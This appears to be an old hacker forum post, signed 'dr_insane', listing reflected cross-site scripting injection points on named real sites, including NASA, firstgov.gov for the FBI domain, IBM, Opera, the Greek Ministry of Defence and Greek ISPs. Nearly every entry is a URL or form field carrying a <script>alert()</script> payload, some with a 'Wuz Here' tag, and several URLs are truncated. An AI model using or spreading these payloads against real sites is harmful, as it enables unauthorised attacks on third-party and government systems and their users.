Here there are some Vulnerable sites i found:

We start with NASA.GOV

http://search.nasa.gov/nasasearch/se...ubmitsearch.x=<script>alert("m")</script>&submitsearch.y=<script>alert("m")</script>

http://search.nasa.gov/nasasearch/br...gory+Search.x=<script>alert("m")</script>&Category+Search.y=<script>alert("m")</script>

And we go on with Fbi:

hmmm what is this?

http://www.firstgov.gov/fgsearch/ind...ubmit=+Search+


w0w! INTERNAL server error

http://www.firstgov.gov/fgsearch/index.jsp?dom=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

http://www.firstgov.gov/fgsearch/index.jsp?dom0=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

Ibm is also vulnerable:

http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

www.opera.com
In the search engine write: <script>alert("m")</script>

http://www.business.com/search/rslt_...=&bdcf=&vt=all

http://www.searchengineworld.com/
--Write <script>alert("m")</script> in the e-mail address field


http://www.crackfound.com/engine.cgi...9%3C/script%3E

http://www.thebugs.ws/search.php?q=%...9%3C/script%3E

http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

http://www.anubis.gr/Users/default.a...er&act=newUser

http://www.pcmaster.gr/forum/default.asp?Action=Search


Ministry of defence in Greece:
http://www.mod.mil.gr/contact/all_ma...html?seclevel=<script>alert("m")</script>

Hol (hellas on line ISP):

http://search.hol.gr/advanced.asp?advanced=<script>alert("insane")</script)&c2=<script>alert("insane")</script)&o2=<script>alert("Dr_insane%20Wuz%20Here")</script)&ct=<script>alert("Dr_insane%20Wuz%20Here")</script)&q1=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%29&searchlang=&q2=<script>alert("m")</script)&so=<script>alert("Dr_insane%20Wuz%20Here")</script)

http://search.hol.gr/search.asp?ct=G...o.x=14&Go.y=16


http://www.linuxfreaks.gr/

http://www.findlink.gr/searching.asp?key=<script>alert("m")</script>&logic=any
http://search.pathfinder.gr/search?q...ipt%3E&tab=web

http://www.anazitisis.gr/cgi-bin/hts....x=5&search.y=<script>alert("m")</script>

http://www.ditto.com/searchResults.a...t%3E&search.x=<script>alert("m")</script>&search.y=<script>alert("m")</script>

http://promosearch.atomz.com/search/...8112&submit.x=<script>alert("m")</script>&submit.y=<script>alert("m")</script>

http://www.askjeeves.com ****

http://www.mixer.gr/cgi-bin/mxmeta?q...3C%2Fscript%3E
http://www.robby.gr/search.rsp?searc...615407&parent=

EOF

/dr_insane
dr_insane at pathfinder.gr